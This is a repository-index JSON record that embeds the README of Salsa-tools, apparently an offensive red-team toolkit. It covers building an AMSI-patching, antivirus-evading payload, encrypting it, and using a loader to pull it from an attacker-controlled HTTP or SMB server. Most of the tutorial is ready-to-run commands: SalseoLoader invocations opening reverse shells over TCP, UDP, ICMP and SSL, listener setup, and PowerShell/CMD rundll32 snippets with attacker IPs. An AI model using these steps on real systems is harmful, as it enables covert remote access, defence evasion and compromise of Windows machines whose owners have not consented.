{"id":13539535,"url":"https://github.com/hackplayers/salsa-tools","last_synced_at":"2025-04-02T06:31:05.970Z","repository":{"id":45456740,"uuid":"169153043","full_name":"Hackplayers/Salsa-tools","owner":"Hackplayers","description":"Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY and AV bypass, AMSI patched","archived":false,"fork":false,"pushed_at":"2020-01-31T22:41:35.000Z","size":8568,"stargazers_count":578,"open_issues_count":0,"forks_count":130,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-11-03T04:32:38.028Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackplayers.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-02-04T21:31:28.000Z","updated_at":"2024-11-01T08:39:49.000Z","dependencies_parsed_at":"2022-07-14T13:00:50.999Z","dependency_job_id":null,"html_url":"https://github.com/Hackplayers/Salsa-tools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackplayers%2FSalsa-tools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackplayers","download_url":"https://codeload.github.com/Hackplayers/Salsa-tools/ta
r.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767759,"owners_count":20830550,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:27.359Z","updated_at":"2025-04-02T06:31:00.961Z","avatar_url":"https://github.com/Hackplayers.png","language":"C#","funding_links":[],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"b1161d6c4cb520d0cd574347cd18342e\"\u003e\u003c/a\u003e免杀\u0026\u0026躲避AV检测"],"readme":"![License](https://img.shields.io/badge/license-GNU-green.svg?style=flat-square)\n\n```\n   _____       __              ______            __    \n  / ___/____ _/ /________ _   /_  __/___  ____  / /____\n  \\__ \\/ __ `/ / ___/ __ `/    / / / __ \\/ __ \\/ / ___/\n ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) \n/____/\\__,_/_/____/\\__,_/    /_/  \\____/\\____/_/____/  \n\n```\n# Salsa Tools - An AV-Safe Reverse Shell dipped in bellota sauce  \n\nSalsa Tools is a collection of three different tools that, combined, allow you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written in C#. 
Salsa Tools was publicly released by Luis Vacas during his talk “Inmersión en la explotación tiene rima”, which took place at h-c0n on 9th February 2019.\n\n\n## Features\n    * TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     \n    * AV Safe (17th February)\n    * AMSI patchers\n    * PowerShell execution \n    * ...\n    \n## Overview\nSalsa-Tools is made from three different ingredients:\n    - EvilSalsa\n    - EncrypterAssembly\n    - SalseoLoader\nIts behaviour is as follows:\n\n\n\n## Setup\n### Requirements\n - Visual Studio 2017 (or similar)\n \t- Microsoft.PowerShell.3.ReferenceAssemblies dependencies compiling in .NET 4.0\n\t- Microsoft.PowerShell.2.ReferenceAssemblies dependencies compiling in .NET 3.5\n - Python 2.7       \n### Running la Salsa\n#### Cooking EvilSalsa\n\n```\n   ___ __ __  ____  _            \n  /  _]  |  ||    || |           \n /  [_|  |  | |  | | |           \n|    _]  |  | |  | | |___        \n|   [_|  :  | |  | |     |       \n|     |\\   /  |  | |     |       \n|_____| \\_/  |____||_____|       \n                                 \n  _____  ____  _     _____  ____ \n / ___/ /    || |   / ___/ /    |\n(   \\_ |  o  || |  (   \\_ |  o  |\n \\__  ||     || |___\\__  ||     |\n /  \\ ||  _  ||     /  \\ ||  _  |\n \\    ||  |  ||     \\    ||  |  |\n  \\___||__|__||_____|\\___||__|__|\n  \n[+] That is our Payload\n                                 \n```\n\nEvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as follows: as soon as the payload starts, it loads `System.Management.Automation.dll`, which creates a runspace. Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). Once EvilSalsa is loaded, first things first, the existence of `c:\\windows\\system32\\amsi.dll` is checked. 
If it exists, it is patched using a home-cooked variant of the CyberArk and Rastamouse bypasses.\n\n\n#### Mixing EncrypterAssembly and EvilSalsa\n```\n  ______                             _            \n |  ____|                           | |           \n | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ \n |  __| | '_ \\ / __| '__| | | | '_ \\| __/ _ \\ '__|\n | |____| | | | (__| |  | |_| | |_) | ||  __/ |   \n |______|_| |_|\\___|_|   \\__, | .__/ \\__\\___|_|   \n     /\\                   __/ | || |   | |        \n    /  \\   ___ ___  ___ _|___/|_|| |__ | |_   _   \n   / /\\ \\ / __/ __|/ _ \\ '_ ` _ \\| '_ \\| | | | |  \n  / ____ \\\\__ \\__ \\  __/ | | | | | |_) | | |_| |  \n /_/    \\_\\___/___/\\___|_| |_| |_|_.__/|_|\\__, |  \n                                           __/ |  \n                                          |___/   \n\t\t\t  \n [+] Software that encrypts the payload using RC4\n [+] We have the version in python and the version in .exe\n```\n\nEncrypterAssembly can be used as a Python script or as an Exe binary.\nIt encrypts the previously generated EvilSalsa.\n\nPython usage:\n```\npython encrypterassembly.py \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT\u003e\n```\nExecutable usage:\n```\nEncrypterassembly.exe \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT\u003e\n```\n#### Bringing the Encrypted EvilSalsa to the table with SalseoLoader\nSalseoLoader is in charge of loading the encrypted payload. It can be compiled either as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor \"main\" must be exported. 
Arguments are added using environmental variables.\n\n```\n  _____  ____  _     _____   ___   ___\n / ___/ /    || |   / ___/  /  _] /   \\\n(   \\_ |  o  || |  (   \\_  /  [_ |     |\n \\__  ||     || |___\\__  ||    _]|  O  |\n /  \\ ||  _  ||     /  \\ ||   [_ |     |\n \\    ||  |  ||     \\    ||     ||     |\n  \\___||__|__||_____|\\___||_____| \\___/\n\n _       ___    ____  ___      ___  ____\n| |     /   \\  /    ||   \\    /  _]|    \\\n| |    |     ||  o  ||    \\  /  [_ |  D  )\n| |___ |  O  ||     ||  D  ||    _]|    /\n|     ||     ||  _  ||     ||   [_ |    \\\n|     ||     ||  |  ||     ||     ||  .  \\\n|_____| \\___/ |__|__||_____||_____||__|\\_|\n\n                             By: CyberVaca@HackPlayers\n\n[+] Usage:\n\n    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT\n    [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT\n    [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST\n    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS\n    [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT\n    [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseSSL LHOST LPORT\n    [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode\n    [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C\n\n[+] Available Payloads:\n\n    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode\n    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity\n```\n\n# Tutorial\n\n## Compiling the binaries\n\nDownload the source code from the github and compile **EvilSalsa** and **SalseoLoader**. 
You will need **Visual Studio** installed to compile the code.\n\n\nCompile those projects for the architecture of the Windows box where you are going to use them (if the Windows box supports x64, compile them for that architecture).\n\n\nYou can **select the architecture** inside Visual Studio in the **left \"Build\" tab, under \"Platform Target\"**.\n\n(If you can't find these options, click on the \"**Project**\" tab and then on \"**\u003cProject-Name\u003e Properties**\")\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen1.png)\n\nThen, build both projects (Build -\u003e Build Solution); the path of the executable will appear in the build log:\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen2.png)\n\n## Prepare the Backdoor\n\nFirst of all, you will need to encode the **EvilSalsa.dll**. To do so, you can use the Python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**.\n\n### Python\n```bash\npython EncrypterAssembly/encrypterassembly.py \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT_FILE\u003e\npython EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt\n```\n\n### Windows\n```\nEncrypterAssembly.exe \u003cFILE\u003e \u003cPASSWORD\u003e \u003cOUTPUT_FILE\u003e\nEncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt\n```\n\nOk, now you have everything you need to execute the whole Salseo thing: the **encoded EvilSalsa.dll** and the **SalseoLoader binary**.\n**Upload the SalseoLoader.exe binary to the machine. 
It shouldn't be detected by any AV...**\n\n## Execute the backdoor\n\n### Getting a TCP reverse shell (downloading the encoded dll through HTTP)\n\nRemember to start an nc listener for the reverse shell, and an HTTP server to serve the encoded evilsalsa.\n\n`SalseoLoader.exe password http://\u003cAttacker-IP\u003e/evilsalsa.dll.txt reversetcp \u003cAttacker-IP\u003e \u003cPort\u003e`\n\n### Getting a UDP reverse shell (downloading the encoded dll through SMB)\n\nRemember to start an nc listener for the reverse shell, and an SMB server to serve the encoded evilsalsa (impacket-smbserver).\n\n`SalseoLoader.exe password \\\\\u003cAttacker-IP\u003e/folder/evilsalsa.dll.txt reverseudp \u003cAttacker-IP\u003e \u003cPort\u003e`\n\n### Getting a TCP reverse shell over SSL (using a local file)\n\n**Set up the listener on the attacker machine:**\n\n```\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -key key.pem -cert cert.pem -port \u003cport\u003e -tls1\n```\n**Execute the backdoor:**\n```\nSalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL \u003cAttacker-IP\u003e \u003cPort\u003e\n```\n\n### Getting an ICMP reverse shell (encoded dll already inside the victim)\n\n**This time you need a special tool on the client to receive the reverse shell. 
Download: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)**\n\n**Disable ICMP Replies:**\n```\nsysctl -w net.ipv4.icmp_echo_ignore_all=1\n\n# When you finish, you can enable them again by running:\nsysctl -w net.ipv4.icmp_echo_ignore_all=0\n```\n\n**Execute the client:**\n\n`python icmpsh_m.py \"\u003cAttacker-IP\u003e\" \"\u003cVictim-IP\u003e\"`\n\n**Inside the victim, let's execute the salseo thing:**\n\n`SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp \u003cAttacker-IP\u003e`\n\n\n## Compiling SalseoLoader as a DLL exporting the main function\n\nOpen the SalseoLoader project using Visual Studio.\n\n### Add \\[DllExport\\] before the main function\n\nBefore the main function, add this line: \\[DllExport\\]\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen3.png)\n\n### Install DllExport for this project\n\n**Tools --\u003e NuGet Package Manager --\u003e Manage NuGet Packages for Solution...**\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen4.png)\n\n**Search for the DllExport package (using the Browse tab), and press Install (and accept the popup)**\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen5.png)\n\nThe files **DllExport.bat** and **DllExport_Configure.bat** will have appeared in your project folder.\n\n### Uninstall DllExport\n\nPress **Uninstall** (yeah, it's weird but trust me, it is necessary)\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen6.png)\n\n### Exit Visual Studio and execute DllExport_Configure\n\nJust **exit** Visual Studio.\n\nThen, go to your **SalseoLoader folder** and **execute DllExport_Configure.bat**.\nSelect **x64** (if you are going to use it inside an x64 box, which was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen7.png)\n\n### Open the project again with Visual Studio\n**\\[DllExport\\]** should no longer be marked as an error\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen8.png)\n\n### Build the solution\nSelect **Output Type = Class Library** (Project --\u003e SalseoLoader Properties --\u003e Application --\u003e Output type = Class Library)\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen9.png)\n\nSelect **x64 platform** (Project --\u003e SalseoLoader Properties --\u003e Build --\u003e Platform target = x64)\n\n![](https://github.com/Hackplayers/Salsa-tools/blob/master/images/imagen10.png)\n\nTo **build** the solution: Build --\u003e Build Solution (the path of the new DLL will appear in the Output console)\n\n### Test the generated DLL\n\nCopy and paste the DLL where you want to test it.\n\nExecute:\n\n`rundll32.exe SalseoLoader.dll,main`\n\nIf no error appears, you probably have a functional DLL!\n\n## Get a shell using the DLL\n\nDon't forget to use an **HTTP server and set an nc listener**\n\n### PowerShell\n\n```powershell\n$env:pass=\"password\"\n$env:payload=\"http://10.2.0.5/evilsalsax64.dll.txt\"\n$env:lhost=\"10.2.0.5\"\n$env:lport=\"1337\"\n$env:shell=\"reversetcp\"\nrundll32.exe SalseoLoader.dll,main\n```\n\n### CMD\n\n```cmd\nset pass=password\nset payload=http://10.2.0.5/evilsalsax64.dll.txt\nset lhost=10.2.0.5\nset lport=1337\nset shell=reversetcp\nrundll32.exe SalseoLoader.dll,main\n```\n\nDocumented by https://github.com/carlospolop-forks/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackplayers%2Fsalsa-tools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackplayers%2Fsalsa-tools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackplayers%2Fsalsa-tools/lists"}